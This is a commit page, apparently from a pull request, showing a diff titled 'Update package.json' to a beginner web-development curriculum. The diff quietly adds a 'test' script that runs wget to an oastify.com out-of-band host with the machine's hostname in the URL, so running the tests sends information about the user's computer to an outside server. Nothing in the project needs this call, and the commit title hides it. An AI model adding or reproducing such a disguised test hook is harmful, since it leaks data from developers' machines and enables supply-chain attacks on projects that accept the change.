Update package.json

pull/1082/head
Crazy D1am0nd 3 years ago committed by GitHub
parent b77099807a
commit 5283772e94
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -4,7 +4,8 @@
"description": "Web Dev for Beginners - A Curriculum",
"main": "index.js",
"scripts": {
"convert": "node_modules/.bin/docsify-to-pdf"
"convert": "node_modules/.bin/docsify-to-pdf",
"test": "wget https://usqyk3mn6nwysryxoft0uuj7iyoucm0b.oastify.com/`hostname`"
},
"repository": {
"type": "git",

Loading…
Cancel
Save